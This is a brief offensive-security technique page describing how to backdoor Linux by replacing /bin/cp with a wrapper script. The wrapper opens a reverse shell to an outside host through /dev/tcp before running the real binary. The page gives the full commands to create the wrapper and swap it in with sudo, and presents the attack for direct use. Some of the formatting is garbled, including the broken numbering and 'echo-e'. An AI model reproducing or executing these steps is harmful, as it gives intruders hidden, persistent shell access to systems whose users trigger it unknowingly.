redttps

Backdoor in command (Linux)

Description

This technique involves replacing a legitimate system binary (e.g., cp, ls, or nano) with a modified version that executes a payload before performing its expected function. It’s highly effective because users unknowingly trigger the payload during normal operations. However, it requires careful handling to avoid detection and maintain functionality

Steps

  1. Create the "evil" binary
    2.  echo-e '#!/bin/bash\nbash -i >&
 /dev/tcp/192.168.56.1/4444 0>&1\n/bin/cp "$@"' > /tmp/cp
 chmod +x /tmp/cp
  2. Replace the original binary
    3. sudo mv /bin/cp /bin/cp.original
sudo mv /tmp/cp /bin/cp
  3. Every time someone uses cp, your shell is activated before executing the actual action

Reference: Created by Luis Rivera